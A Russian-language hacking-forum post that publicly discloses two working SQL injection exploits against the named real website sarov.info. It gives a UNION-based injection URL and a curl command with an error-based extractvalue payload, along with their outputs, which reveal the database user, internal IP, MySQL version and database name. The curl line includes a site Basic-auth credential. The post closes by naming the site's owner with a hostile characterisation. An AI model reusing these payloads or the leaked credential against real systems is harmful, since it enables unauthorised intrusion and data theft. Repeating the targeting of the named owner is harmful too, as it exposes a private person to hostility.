26.08.2019, 02:51
|
|
Новичок
Регистрация: 26.08.2019
Сообщений: 20
С нами:
3536246
Репутация:
8
|
|
https://sarov.info Колючий Саров Яндекс ИКС (бывший тИЦ) 3600
Несколько SQL иньекций.
Первая:
Код:
https://sarov.info/phones/yp/index.php?cat=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3+--+1
admin_bbnews@192.168.1.17:5.6.38:admin_bbnews
Вторая:
Код:
curl https://sarov.info/bills/np/doubles.php --data "bill_id%5B1401653 and extractvalue(1,concat(0x3b,(select(version()))))%23%5D=on&delform=1" -H "Authorization: Basic a29sc2FyOmlsZW5hc2Fy"
XPATH syntax error: ';5.6.38'
Владелец ресурса, Кирилл Асташов aka BadBlock известный в Нижегородской области борец с экстремизмом в комментариях, с последующими заявлениями в центр "Э".
|
|
|